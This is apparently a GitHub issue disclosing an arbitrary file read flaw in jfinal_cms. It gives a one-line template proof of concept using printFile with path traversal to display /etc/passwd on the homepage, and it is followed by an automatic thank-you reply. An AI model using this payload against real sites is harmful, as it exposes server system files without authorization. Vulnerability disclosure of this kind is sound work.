Arbitrary file reading vulnerability exists
hacker-mao opened this issue · 1 comments
hacker-mao commented
Enter the background, edit /template/includes/jquery.html in the template management , poc is as follows
${printFile('../../../../../../../../../../../../../../../etc/passwd')}
Reopen the homepage http://localhost:8877/jfinal_cms/ , can see /etc/passwd
ElevenKong commented
您好,您的来信我已收到!谢谢!
Best Wishes!
——孔祥亮